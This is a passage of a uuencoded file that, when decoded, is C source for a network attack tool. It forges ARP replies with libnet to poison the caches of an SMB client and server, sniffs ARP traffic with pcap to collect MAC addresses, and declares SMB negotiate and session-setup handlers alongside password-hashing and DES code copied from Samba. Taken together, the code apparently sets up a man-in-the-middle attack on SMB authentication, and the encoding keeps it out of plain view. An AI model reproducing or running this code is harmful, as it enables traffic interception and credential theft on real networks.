+M(&]F('!A<W-W;W)D("A53DE#3T1%*2HO#0H@=5]I;G0X7W0@4F5S97)V961;
+M-%T["0DO*G)E<V5R=F5D("AM=7-T(&)E(#`I*B\-"B!U7VEN=#A?="!#87!A
+M8FEL:71I97-;-%T["2\J8VQI96YT(&-A<&%B:6QI=&EE<RHO#0H@=5]I;G0X
+M7W0@0GET94-O=6YT6S)=.PD)+RI#;W5N="!O9B!D871A(&)Y=&5S.VUI;CTP
+M*B\-"GT@4VUB4V5T=7!84F5Q=65S=$AD<B`[#0H-"G1Y<&5D968@<W1R=6-T
+M#0I[#0H@=5]I;G0X7W0@5V]R9$-O=6YT.PDO*G9A;'5E/30@*B\-"B!U7VEN
+M=#A?="!!;F180V]M;6%N9#L)+RIS96-O;F1A<GD@*%@I(&-O;6UA;F0L,'A&
+M1B`](&YO;F4J+PT*('5?:6YT.%]T($%N9%A297-E<G9E9#L)+RIR97-E<G9E
+M9"`H;75S="!B92!Z97)O*2HO#0H@=5]I;G0X7W0@06YD6$]F9G-E=%LR73L)
+M+RIO9F9S970@*B\-"B!U7VEN=#A?="!&;&%G<ULR73L)+RI!9&1I=&EO;F%L
+M(&EN9F]R;6%T:6]N("HO#0H@=5]I;G0X7W0@4&%S<W=O<F1,96YG=&A;,ET[
+M"2\J3&5N9W1H(&]F('!A<W-W;W)D*B\-"B!U7VEN=#A?="!">71E0V]U;G1;
+M,ET["2\J0V]U;G0@;V8@9&%T82!B>71E<R`[(&UI;CTS*B\-"GT@4VUB5&-O
+M;EA297%U97-T2&1R(#L-"@T*+RHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*@T*
+M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("!&54Y#5$E/3E,@#0HJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHO#0H-"G9O:60@07)P4F5Q=65S<DEN
+M:F5C=&EO;BAU7VEN=#,R7W0@*BP-"B`@("`@("`@("`@("`@("`@("`@("`@
+M("!U7VEN=#,R7W0@*BP-"B`@("`@("`@("`@("`@("`@("`@("`@("!U7V-H
+M87(@*BP-"B`@("`@("`@("`@("`@("`@("`@("`@("!U7V-H87(@*BP-"B`@
+M("`@("`@("`@("`@("`@("`@("`@("!C:&%R("HL#0H)"0D@<&-A<%]T("HI
+M.PT*#0H-"G9O:60@07)P4&]I<V]N*'5?:6YT,S)?="`J+`T*("`@("`@("`@
+M("`@("`@=5]I;G0S,E]T("HL#0H@("`@("`@("`@("`@("!U7V-H87(@*BP-
+M"B`@("`@("`@("`@("`@('5?8VAA<B`J+`T*("`@("`@("`@("`@("`@8VAA
+M<B`J*3L-"@T*=F]I9"!'971%;F5T061D<F5S<R@-"B`@("`@("`@("`@("`@
+M("`@("`@=5]C:&%R("HL#0H@("`@("`@("`@("`@("`@("`@(&-H87(@*BD[
+M#0H-"@T*=F]I9"!.96=0<F]T4F5P;'DH#0H@("`@("`@("`@("`@("`@("!U
+M7V-H87(@*BP-"B`@("`@("`@("`@("`@("`@('5?8VAA<B`J+`T*("`@("`@
+M("`@("`@("`@("`@:6YT("HI.PT*#0IV;VED(%-E='5P6%)E<75E<W0H#0H@
+M("`@("`@("`@("`@("`@("`@('5?8VAA<B`J+`T*("`@("`@("`@("`@("`@
+M("`@("!U7V-H87(@*BP-"B`@("`@("`@("`@("`@("`@("`@:6YT*3L@#0H-
+M"B\J*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BH-"B`@("`@("`@($5.0U)94%1)
+M3TX@1E5.0U1)3TY3("AS:&%M969U;&QY('1A:V5N(&9R;VT@<V%M8F$@(2D-
+M"BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*B\-"G9O:60@4TU"96YC<GEP="AU
+M7V-H87(@*BP@=5]C:&%R("HL('5?8VAA<B`J*3L-"@T*=F]I9"!334)/5T9E
+M;F-R>7!T*'5?8VAA<B`J+"!U7V-H87(@*BP@=5]C:&%R("HI.PT*#0IV;VED
+M($5?4#$V*&-O;G-T('5N<VEG;F5D(&-H87(@*BP@=6YS:6=N960@8VAA<B`J
+M*3L-"@T*=F]I9"!%7U`R-"AC;VYS="!U;G-I9VYE9"!C:&%R("HL(`T*("`@
+M("`@("`@("!C;VYS="!U;G-I9VYE9"!C:&%R("HL#0H@("`@("`@("`@('5N
+M<VEG;F5D(&-H87(@*BD[#0H-"G-T871I8R!V;VED('!E<FUU=&4H8VAA<B`J
+M+&-H87(@*BQU7V-H87(@*BQI;G0I.PT*#0IS=&%T:6,@=F]I9"!L<VAI9G0H
+M8VAA<B`J+&EN="QI;G0I.PT*#0IS=&%T:6,@=F]I9"!C;VYC870H8VAA<B`J
+M+&-H87(@*BQC:&%R("HL:6YT+&EN="D[#0H-"G-T871I8R!V;VED('AO<BAC
+M:&%R("HL8VAA<B`J+&-H87(@*BQI;G0I.PT*#0IS=&%T:6,@=F]I9"!D;VAA
+M<V@H8VAA<B`J+&-H87(@*BQC:&%R("HL:6YT*3L-"@T*<W1A=&EC('9O:60@
+M<W1R7W1O7VME>2AC;VYS="!U;G-I9VYE9"!C:&%R("HL=6YS:6=N960@8VAA
+M<B`J*3L-"@T*<W1A=&EC('9O:60@<VUB:&%S:"AU;G-I9VYE9"!C:&%R("HL
+M8V]N<W0@=6YS:6=N960@8VAA<B`J+&-O;G-T(`T*"0EU;G-I9VYE9"!C:&%R
+M("HL:6YT("D[#0H-"B\J*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BH-"B`@("`@
+M("`@("`@("`@("`@("`@("`@("!42$4@0T]$10T**BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ+PT*#0HO*E1O('-E;F0@82!!4E`@<F5P;'DJ+PT*#0IV;VED
+M($%R<%!O:7-O;BAU7VEN=#,R7W0@*D-L:65N="P@("`@+RI#;&EE;G0G<R!)
+M4"!A9')E<W,J+PT*("`@("`@("`@("`@("!U7VEN=#,R7W0@*E-M8E-E<G9E
+M<BP@+RI334(@4V5R=F5R)W,@25`@861R97-S*B\-"B`@("`@("`@("`@("`@
+M=5]C:&%R("I%;F5T0VQI96YT+"`@("\J0VQI96YT)W,@34%#($%D<F5S<RHO
+M#0H@("`@("`@("`@("`@('5?8VAA<B`J16YE=%-M8E-E<G9E<BPO*G-E<G9E
+M<B=S($U!0R!!9')E<W,J+PT*("`@("`@("`@("`@("!C:&%R("I$979I8V4I
+M("\J1&5V:6-E(&YA;64@9F]R(&EN:F5C=&EO;BHO#0I[#0H@;&EB;F5T7W0@
+M*FP[#0H@;&EB;F5T7W!T86=?="!486<[#0H@8VAA<B!%<G)"=69;3$E"3D54
+M7T524D)51E]325I%73L-"@T*#0HO*E=E(&EN:F5C="!T:&4@<&%C:V5T(&1I
+M<F5C=&QY(&]N('1H92!N971W;W)K*B\-"@T*(&P@/2!L:6)N971?:6YI="A,
+M24).151?3$E.2RQ$979I8V4L17)R0G5F*3L-"@T*+RI792!B=6EL9"!T:&4@
+M05)0(&AE861E<BHO#0H-"B!486<@/2!L:6)N971?8G5I;&1?87)P*`T*("`@
+M("`@("`@("`@("`@("`@("`@("`@05)02%)$7T542$52+"\J2&%R9'=A<F4@
+M861D<BHO#0H@("`@("`@("`@("`@("`@("`@("`@("!%5$A%4E194$5?25`L
+M+RI0<F]T;V-O;"!A9&1R*B\-"B`@("`@("`@("`@("`@("`@("`@("`@(#8L
+M+RI3:7IE(&]F($U!0R!A9')E<W,J+PT*("`@("`@("`@("`@("`@("`@("`@
+M("`@-"PO*E-I>F4@;V8@25`@861R97-S*B\-"B`@("`@("`@("`@("`@("`@
+M("`@("`@($%24$]07U)%4$Q9+`T*("`@("`@("`@("`@("`@("`@("`@("`@
+M16YE=$-L:65N="PO*F-L:65N="=S($U!0R!A9')E<W,J+PT*("`@("`@("`@
+M("`@("`@("`@("`@("`@*'5?8VAA<B`J*2!#;&EE;G0L+RIC;&EE;G0G<R!)
+M4"!A9')E<W,J+PT*("`@("`@("`@("`@("`@("`@("`@("`@16YE=%-M8E-E
+M<G9E<BPO*E-E<G9E<B!-04,@861D<F5S<RHO#0H@("`@("`@("`@("`@("`@
+M("`@("`@("`H=5]C:&%R("HI("!3;6)397)V97(L("`O*E-E<G9E<B!)4"!A
+M9&1R97-S*B\-"B`@("`@("`@("`@("`@("`@("`@("`@($Y53$PL#0H@("`@
+M("`@("`@("`@("`@("`@("`@("`P+`T*("`@("`@("`@("`@("`@("`@("`@
+M("`@;"P-"B`@("`@("`@("`@("`@("`@("`@("`@(#`I.PT*#0HO*D9O;&QO
+M=VEN9R!B>2!T:&4@8G5I;&1I;F<@;V8@=&AE(&5T:&5R;F5T(&AE861E<BHO
+M#0H-"B!486<@/2!L:6)N971?875T;V)U:6QD7V5T:&5R;F5T*`T*("`@("`@
+M("`@("`@("`@("`@("`@("`@("`@("`@("`@+RI%=&AE<FYE="!D97-T:6YA
+M=&EO;BHO#0H@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("!%;F5T
+M4VUB4V5R=F5R+"`@#0H@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
+M("!%5$A%4E194$5?05)0+"`@+RI0<F]T;V-O;"!4>7!E*B\-"@D)"0D@;"D[
+M#0H-"@T*+RI7<FET92!T:&4@4&%C:V5T('=I<F4J+PT*#0H@;&EB;F5T7W=R
+M:71E*&PI.PT*#0HO*DQI8FYE="!D97-T<F]Y(&PJ+PT*#0H@;&EB;F5T7V1E
+M<W1R;WDH;"D[#0I]#0H-"B\J*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*B\-"@T*
+M+RI4;R!H879E('-E<G9E<B!A;F0@8VQI96YT($U!0R!A9&1R97-S97,J+PT*
+M#0IV;VED($%R<%)E<75E<W1);FIE8W1I;VXH=5]I;G0S,E]T("I)<%-R8RP@
+M("`@+RIS<F,G<R!)4"!A9')E<W,J+PT*("`@("`@("`@("`@("`@("`@("`@
+M("`@('5?:6YT,S)?="`J27!$<W0L("\J9&5S="=S($E0(&%D<F5S<RHO#0H@
+M("`@("`@("`@("`@("`@("`@("`@("`@=5]C:&%R("I%;F5T4W)C+"`@("\J
+M<W)C)W,@34%#($%D<F5S<RHO#0H@("`@("`@("`@("`@("`@("`@("`@("`@
+M=5]C:&%R("I%;F5T1'-T+"\J9&5S="=S($U!0R!!9')E<W,J+PT*("`@("`@
+M("`@("`@("`@("`@("`@("`@(&-H87(@*D1E=FEC92P@+RI$979I8V4@;F%M
+M92!F;W(@:6YJ96-T:6]N*B\-"B`@("`@("`@("`@("`@("`@("`@("`@("!P
+M8V%P7W0@*D1E<V-R*0T*>PT*(&QI8FYE=%]T("IL.PT*(&QI8FYE=%]P=&%G
+M7W0@5&%G.PT*(&-H87(@17)R0G5F6TQ)0DY%5%]%4E)"549?4TE:15T[#0H-
+M"B!S=')U8W0@<&-A<%]P:W1H9'(@2&5A9&5R.PT*#0H@=5]I;G0S,E]T($%R
+M<%-R8SL-"B!U7VEN=#,R7W0@07)P1'-T.PT*#0H@<W1R=6-T(&5T:&AD<B`J
+M171H97)(9'([#0H-"B!S=')U8W0@971H97)?87)P("I!<G!(9'([#0H-"B!C
+M:&%R("I086-K970[#0H@#0H@=5]C:&%R(%IE<F];151(7T%,14Y=(#T@>S!X
+M,"PP>#`L,'@P+#!X,"PP>#`L,'@P?3L@#0H@#0H@=5]C:&%R($)R;V%D8V%S
+M=%M%5$A?04Q%3ET@/2![,'AF9BPP>&9F+#!X9F8L,'AF9BPP>&9F+#!X9F9]
+M.PT*#0HO*DQI8FYE="!I;FET:6%L:7IA=&EO;BHO#0H-"B!L(#T@;&EB;F5T
+M7VEN:70H3$E"3D547TQ)3DLL1&5V:6-E+$5R<D)U9BD[#0H-"B\J5V4@8G5I
+M;&0@=&AE($%24"!H96%D97(J+PT*#0H@5&%G(#T@;&EB;F5T7V)U:6QD7V%R
+M<"@-"B`@("`@("`@("`@("`@("`@("`@("`@($%24$A21%]%5$A%4BPO*DAA
+M<F1W87)E(&%D9'(J+PT*("`@("`@("`@("`@("`@("`@("`@("`@151(15)4
+M65!%7TE0+"\J4')O=&]C;VP@861D<BHO#0H@("`@("`@("`@("`@("`@("`@
+M("`@("`V+"\J4VEZ92!O9B!-04,@861R97-S*B\-"B`@("`@("`@("`@("`@
+M("`@("`@("`@(#0L+RI3:7IE(&]F($E0(&%D<F5S<RHO#0H@("`@("`@("`@
+M("`@("`@("`@("`@("!!4E!/4%]215%515-4+`T*("`@("`@("`@("`@("`@
+M("`@("`@("`@16YE=%-R8RPO*F-L:65N="=S($U!0R!A9')E<W,J+PT*("`@
+M("`@("`@("`@("`@("`@("`@("`@*'5?8VAA<B`J*2!)<%-R8RPO*F-L:65N
+M="=S($E0(&%D9')E<W,J+PT*("`@("`@("`@("`@("`@("`@("`@("`@6F5R
+M;RP@+RI.;W1H:6YG("$@/3X@05)0(%)%455%4U0J+R`-"B`@("`@("`@("`@
+M("`@("`@("`@("`@("AU7V-H87(@*BD@($EP1'-T+"`@+RIC;&EE;G0G<R!)
+M4"!A9&1R97-S*B\-"B`@("`@("`@("`@("`@("`@("`@("`@($Y53$PL#0H@
+M("`@("`@("`@("`@("`@("`@("`@("`P+`T*("`@("`@("`@("`@("`@("`@
+M("`@("`@;"P-"B`@("`@("`@("`@("`@("`@("`@("`@(#`I.PT*#0HO*D9O
+M;&QO=VEN9R!B>2!T:&4@8G5I;&1I;F<@;V8@=&AE(&5T:&5R;F5T(&AE861E
+M<BHO#0H-"B!486<@/2!L:6)N971?875T;V)U:6QD7V5T:&5R;F5T*`T*("`@
+M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@0G)O861C87-T+"`@+RI%
+M=&AE<FYE="!D97-T:6YA=&EO;BHO#0H@("`@("`@("`@("`@("`@("`@("`@
+M("`@("`@("`@("!%5$A%4E194$5?05)0+"`@+RI0<F]T;V-O;"!4>7!E*B\-
+M"B`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@(&PI.PT*#0H-"B\J
+M5W)I=&4@=&AE(%!A8VME="!W:7)E*B\-"@T*(&QI8FYE=%]W<FET92AL*3L-
+M"@T*+RI,:6)N970@9&5S=')O>2!L*B\-"@T*(&QI8FYE=%]D97-T<F]Y*&PI
+M.PT*#0H@+RI4;R!S;FEF9B!T:&4@05)0(')E<&QY(&%N9"!C;VQL96-T($U!
+M0R!A9&1R97-S97,J+PT*(`T*('=H:6QE*#$I#0H@>PT*("!086-K970@/2`H
+M=5]C:&%R("HI('!C87!?;F5X="A$97-C<BPF2&5A9&5R*3L-"@T*("!%=&AE
+M<DAD<B`]("AS=')U8W0@971H:&1R("HI("A086-K970I.PT*#0H@(&EF*&YT
+M;VAS*$5T:&5R2&1R+3YH7W!R;W1O*3T]151(15)465!%7T%24"D-"B`@>PT*
+M("`@07)P2&1R(#T@*'-T<G5C="!E=&AE<E]A<G`@*BD@*%!A8VME="`K($54
+M2%](3$5.*3L-"B`@("`-"B`@(&EF*&YT;VAS*$%R<$AD<BT^96%?:&1R+F%R
+M7V]P*3T]05)03U!?4D503%DI#0H@("![#0H)("`@#0H@("`@;65M8W!Y*"9!
+M<G!3<F,L("AU7VEN=#,R7W0@*BD@*$%R<$AD<BT^87)P7W-P82DL('-I>F5O
+M9BAU7VEN=#,R7W0I*3L-"B`@("!M96UC<'DH)D%R<$1S="P@*'5?:6YT,S)?
+M="`J*2`H07)P2&1R+3YA<G!?='!A*2P@<VEZ96]F*'5?:6YT,S)?="DI.PT*
+M("`@(`T*("`@(&EF*"`H($%R<%-R8R`@/3T@*DEP1'-T*2`F)@T*("`@("`@
+M("`H($%R<$1S="`@/3T@*DEP4W)C*2D-"B`@("`@>PT*#0H@("`@(&UE;6-P
+M>2@H=5]C:&%R("HI("A%;F5T1'-T*2P-"B`@("`@("`@("`@("AU7V-H87(@
+M*BD@*$%R<$AD<BT^87)P7W-H82DL#0H@("`@("`@("`@("!%5$A?04Q%3BD[
+M#0H@("`@(`T*("`@("!B<F5A:SL-"B`@("!]#0H@("!]#0H@('T-"B!]#0I]
+M#0H-"B\J*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*B\-"@T*+RI4:&4@96YC<GEP
+M=&EO;B!F=6YC=&EO;G,@*"!S:&%M969U;&QY('1A:V5N(&9R;VT@4V%M8F$I
+M*B\-"@T*#0HO*B`-"B`@(%5N:7@@4TU"+TYE=&)I;W,@:6UP;&5M96YT871I
+M;VXN#0H@("!697)S:6]N(#$N.2X-"B`@(%--0B!P87)A;65T97)S(&%N9"!S
+M971U<`T*("`@0V]P>7)I9VAT("A#*2!!;F1R97<@5')I9&=E;&P@,3DY,BTQ
+M.3DX#0H@("!-;V1I9FEE9"!B>2!*97)E;7D@06QL:7-O;B`Q.3DU+@T*("`@
+M#0H@("!4:&ES('!R;V=R86T@:7,@9G)E92!S;V9T=V%R93L@>6]U(&-A;B!R
+M961I<W1R:6)U=&4@:70@86YD+V]R(&UO9&EF>0T*("`@:70@=6YD97(@=&AE
+M('1E<FUS(&]F('1H92!'3E4@1V5N97)A;"!0=6)L:6,@3&EC96YS92!A<R!P
+M=6)L:7-H960@8GD-"B`@('1H92!&<F5E(%-O9G1W87)E($9O=6YD871I;VX[
+M(&5I=&AE<B!V97)S:6]N(#(@;V8@=&AE($QI8V5N<V4L(&]R#0H@("`H870@
+M>6]U<B!O<'1I;VXI(&%N>2!L871E<B!V97)S:6]N+@T*("`@#0H@("!4:&ES
+M('!R;V=R86T@:7,@9&ES=')I8G5T960@:6X@=&AE(&AO<&4@=&AA="!I="!W
+M:6QL(&)E('5S969U;"P-"B`@(&)U="!7251(3U54($%.62!705)204Y463L@
+M=VET:&]U="!E=F5N('1H92!I;7!L:65D('=A<G)A;G1Y(&]F#0H@("!-15)#
+M2$%.5$%"24Q)5%D@;W(@1DE43D534R!&3U(@02!005)424-53$%2(%!54E!/
+M4T4N("!3964@=&AE#0H@("!'3E4@1V5N97)A;"!0=6)L:6,@3&EC96YS92!F
+M;W(@;6]R92!D971A:6QS+@T*("`@#0H@("!9;W4@<VAO=6QD(&AA=F4@<F5C
+M96EV960@82!C;W!Y(&]F('1H92!'3E4@1V5N97)A;"!0=6)L:6,@3&EC96YS
+M90T*("`@86QO;F<@=VET:"!T:&ES('!R;V=R86T[(&EF(&YO="P@=W)I=&4@
+M=&\@=&AE($9R964@4V]F='=A<F4-"B`@($9O=6YD871I;VXL($EN8RXL(#8W
+M-2!-87-S($%V92P@0V%M8G)I9&=E+"!-02`P,C$S.2P@55-!+@T**B\-"@T*
+M#0HO*@T*("`@5&AI<R!I;7!L96UE;G1S('1H92!8+T]P96X@4TU"('!A<W-W
+M;W)D(&5N8W)Y<'1I;VX-"B`@($ET('1A:V5S(&$@<&%S<W=O<F0L(&$@."!B
+M>71E(")C<GEP="!K97DB(&%N9"!P=71S(#(T(&)Y=&5S(&]F(`T*("`@96YC
+M<GEP=&5D('!A<W-W;W)D(&EN=&\@<#(T("HO#0H-"@T*=F]I9"!334)E;F-R
+M>7!T*'5C:&%R("IP87-S=V0L('5C:&%R("IC."P@=6-H87(@*G`R-"D-"GL-
+M"B!U8VAA<B!P,31;,35=+"!P,C%;,C%=.PT*(&EN="!I.PT*("\J06QL(&QE
+M='1E<G,@:6X@=7!P97(@8V%S92!L971T97(J+PT*(`T*(&9O<BAI/3`[:3PQ
+M-3MI*RLI#0H@>PT*("!I9B@@<&%S<W=D6VE=(#X](#DW("8F('!A<W-W9%MI
+M72`\/2`Q,C(I#0H@('L-"B`@('!A<W-W9%MI73UP87-S=V1;:5TM,S([#0H@
+M('T-"B!]#0H@#0H@;65M<V5T*'`R,2PG7#`G+#(Q*3L-"B!M96US970H<#$T
+M+"=<,"<L,30I.PT*('-T<FYC<'DH*&-H87(@*BEP,30L*&-O;G-T(&-H87(@
+M*BEP87-S=V0L,30I.PT*#0H@15]0,38H<#$T+"!P,C$I.R`-"@T*(%--0D]7
+M1F5N8W)Y<'0H<#(Q+"!C."P@<#(T*3L-"@T*?0T*#0IV;VED(%--0D]71F5N
+M8W)Y<'0H=6-H87(@<&%S<W=D6S$V72P@=6-H87(@*F,X+"!U8VAA<B!P,C1;
+M,C1=*0T*>PT*('5C:&%R('`R,5LR,5T[#0H@#0H@#0H@#0H);65M<V5T*'`R
+M,2PG7#`G+#(Q*3L-"B`-"@EM96UC<'DH<#(Q+"!P87-S=V0L(#$V*3L@("`@
+M#0H)15]0,C0H<#(Q+"!C."P@<#(T*3L-"GT-"@T*+RH@#0H@("!5;FEX(%--
+M0B]#2493(&EM<&QE;65N=&%T:6]N+@T*#0H@("!A('!A<G1I86P@:6UP;&5M
+M96YT871I;VX@;V8@1$53(&1E<VEG;F5D(&9O<B!U<V4@:6X@=&AE(`T*("`@
+M4TU"(&%U=&AE;G1I8V%T:6]N('!R;W1O8V]L#0H-"B`@($-O<'ER:6=H="`H
+M0RD@06YD<F5W(%1R:61G96QL(#$Y.3@-"B`@(`T*("`@5&AI<R!P<F]G<F%M
+M(&ES(&9R964@<V]F='=A<F4[('EO=2!C86X@<F5D:7-T<FEB=71E(&ET(&%N
+M9"]O<B!M;V1I9GD-"B`@(&ET('5N9&5R('1H92!T97)M<R!O9B!T:&4@1TY5
+M($=E;F5R86P@4'5B;&EC($QI8V5N<V4@87,@<'5B;&ES:&5D(&)Y#0H@("!T
+M:&4@1G)E92!3;V9T=V%R92!&;W5N9&%T:6]N.R!E:71H97(@=F5R<VEO;B`R
+M(&]F('1H92!,:6-E;G-E+"!O<@T*("`@*&%T('EO=7(@;W!T:6]N*2!A;GD@
+M;&%T97(@=F5R<VEO;BX-"B`@(`T*("`@5&AI<R!P<F]G<F%M(&ES(&1I<W1R
+M:6)U=&5D(&EN('1H92!H;W!E('1H870@:70@=VEL;"!B92!U<V5F=6PL#0H@
+M("!B=70@5TE42$]55"!!3ED@5T%24D%.5%D[('=I=&AO=70@979E;B!T:&4@
+M:6UP;&EE9"!W87)R86YT>2!O9@T*("`@34520TA!3E1!0DE,2519(&]R($9)
+M5$Y%4U,@1D]2($$@4$%25$E#54Q!4B!055)03U-%+B`@4V5E('1H90T*("`@
+M1TY5($=E;F5R86P@4'5B;&EC($QI8V5N<V4@9F]R(&UO<F4@9&5T86EL<RX-
+M"B`@(`T*("`@66]U('-H;W5L9"!H879E(')E8V5I=F5D(&$@8V]P>2!O9B!T
+M:&4@1TY5($=E;F5R86P@4'5B;&EC($QI8V5N<V4-"B`@(&%L;VYG('=I=&@@
+M=&AI<R!P<F]G<F%M.R!I9B!N;W0L('=R:71E('1O('1H92!&<F5E(%-O9G1W
+M87)E#0H@("!&;W5N9&%T:6]N+"!);F,N+"`V-S4@36%S<R!!=F4L($-A;6)R
+M:61G92P@34$@,#(Q,SDL(%5302X-"BHO#0H-"@T*+RH@3D]415,Z(`T*#0H@
+M("!4:&ES(&-O9&4@;6%K97,@;F\@871T96UP="!T;R!B92!F87-T(2!);B!F
+M86-T+"!I="!I<R!A('9E<GD-"B`@('-L;W<@:6UP;&5M96YT871I;VX@#0H-
+M"B`@(%1H:7,@8V]D92!I<R!.3U0@82!C;VUP;&5T92!$15,@:6UP;&5M96YT
+M871I;VXN($ET(&EM<&QE;65N=',@;VYL>0T*("`@=&AE(&UI;FEM=6T@;F5C
+M97-S87)Y(&9O<B!334(@875T:&5N=&EC871I;VXL(&%S('5S960@8GD@86QL
+M(%--0@T*("`@<')O9'5C=',@*&EN8VQU9&EN9R!E=F5R>2!C;W!Y(&]F($UI
+M8W)O<V]F="!7:6YD;W=S.34@979E<B!S;VQD*0T*#0H@("!);B!P87)T:6-U
+M;&%R+"!I="!C86X@;VYL>2!D;R!A('5N8VAA:6YE9"!F;W)W87)D($1%4R!P
+M87-S+B!4:&ES#0H@("!M96%N<R!I="!I<R!N;W0@<&]S<VEB;&4@=&\@=7-E
+M('1H:7,@8V]D92!F;W(@96YC<GEP=&EO;B]D96-R>7!T:6]N#0H@("!O9B!D
+M871A+"!I;G-T96%D(&ET(&ES(&]N;'D@=7-E9G5L(&%S(&$@(FAA<V@B(&%L
+M9V]R:71H;2X-"@T*("`@5&AE<F4@:7,@;F\@96YT<GD@<&]I;G0@:6YT;R!T
+M:&ES(&-O9&4@=&AA="!A;&QO=W,@;F]R;6%L($1%4R`-"B`@("IO<&5R871I
+M;VXN#0H-"B`@($D@8F5L:65V92!T:&ES(&UE86YS('1H870@=&AI<R!C;V1E
+M(&1O97,@;F]T(&-O;64@=6YD97(@251!4@T*("`@<F5G=6QA=&EO;G,@8G5T
+M('1H:7,@:7,@3D]4(&$@;&5G86P@;W!I;FEO;BX@268@>6]U(&%R92!C;VYC
+M97)N960-"B`@(&%B;W5T('1H92!A<'!L:6-A8FEL:71Y(&]F($E405(@<F5G
+M=6QA=&EO;G,@=&\@=&AI<R!C;V1E('1H96X@>6]U#0H@("!S:&]U;&0@8V]N
+M9FER;2!I="!F;W(@>6]U<G-E;&8@*&%N9"!M87EB92!L970@;64@:VYO=R!I
+M9B!Y;W4@8V]M90T*("`@=7`@=VET:"!A(&1I9F9E<F5N="!A;G-W97(@=&\@
+M=&AE(&]N92!A8F]V92D-"BHO#0H-"@T*(V1E9FEN92!U8VAA<B!U;G-I9VYE
+M9"!C:&%R#0H-"G-T871I8R!U8VAA<B!P97)M,5LU-ET@/2![-3<L(#0Y+"`T
+M,2P@,S,L(#(U+"`Q-RP@(#DL#0H)"0D@,2P@-3@L(#4P+"`T,BP@,S0L(#(V
+M+"`Q."P-"@D)"3$P+"`@,BP@-3DL(#4Q+"`T,RP@,S4L(#(W+`T*"0D),3DL
+M(#$Q+"`@,RP@-C`L(#4R+"`T-"P@,S8L#0H)"0DV,RP@-34L(#0W+"`S.2P@
+M,S$L(#(S+"`Q-2P-"@D)"2`W+"`V,BP@-30L(#0V+"`S."P@,S`L(#(R+`T*
+M"0D),30L("`V+"`V,2P@-3,L(#0U+"`S-RP@,CDL#0H)"0DR,2P@,3,L("`U
+M+"`R."P@,C`L(#$R+"`@-'T[#0H-"G-T871I8R!U8VAA<B!P97)M,ELT.%T@
+M/2![,30L(#$W+"`Q,2P@,C0L("`Q+"`@-2P-"B`@("`@("`@("`@("`@("`@
+M("`@("`@("`S+"`R."P@,34L("`V+"`R,2P@,3`L#0H@("`@("`@("`@("`@
+M("`@("`@("`@("`R,RP@,3DL(#$R+"`@-"P@,C8L("`X+`T*("`@("`@("`@
+M("`@("`@("`@("`@("`@,38L("`W+"`R-RP@,C`L(#$S+"`@,BP-"B`@("`@
+M("`@("`@("`@("`@("`@("`@(#0Q+"`U,BP@,S$L(#,W+"`T-RP@-34L#0H@
+M("`@("`@("`@("`@("`@("`@("`@("`S,"P@-#`L(#4Q+"`T-2P@,S,L(#0X
+M+`T*("`@("`@("`@("`@("`@("`@("`@("`@-#0L(#0Y+"`S.2P@-38L(#,T
+M+"`U,RP-"B`@("`@("`@("`@("`@("`@("`@("`@(#0V+"`T,BP@-3`L(#,V
+M+"`R.2P@,S)].PT*#0IS=&%T:6,@=6-H87(@<&5R;3-;-C1=(#T@>S4X+"`U
+M,"P@-#(L(#,T+"`R-BP@,3@L(#$P+"`@,BP-"@D)"38P+"`U,BP@-#0L(#,V
+M+"`R."P@,C`L(#$R+"`@-"P-"@D)"38R+"`U-"P@-#8L(#,X+"`S,"P@,C(L
+M(#$T+"`@-BP-"@D)"38T+"`U-BP@-#@L(#0P+"`S,BP@,C0L(#$V+"`@."P-
+M"@D)"34W+"`T.2P@-#$L(#,S+"`R-2P@,3<L("`Y+"`@,2P-"@D)"34Y+"`U
+M,2P@-#,L(#,U+"`R-RP@,3DL(#$Q+"`@,RP-"@D)"38Q+"`U,RP@-#4L(#,W
+M+"`R.2P@,C$L(#$S+"`@-2P-"@D)"38S+"`U-2P@-#<L(#,Y+"`S,2P@,C,L
+M(#$U+"`@-WT[#0H-"G-T871I8R!U8VAA<B!P97)M-%LT.%T@/2![("`@,S(L
+M("`Q+"`@,BP@(#,L("`T+"`@-2P-"B`@("`@("`@("`@("`@("`@("`@("`@
+M("`@("`T+"`@-2P@(#8L("`W+"`@."P@(#DL#0H@("`@("`@("`@("`@("`@
+M("`@("`@("`@("`@."P@(#DL(#$P+"`Q,2P@,3(L(#$S+`T*("`@("`@("`@
+M("`@("`@("`@("`@("`@("`@,3(L(#$S+"`Q-"P@,34L(#$V+"`Q-RP-"B`@
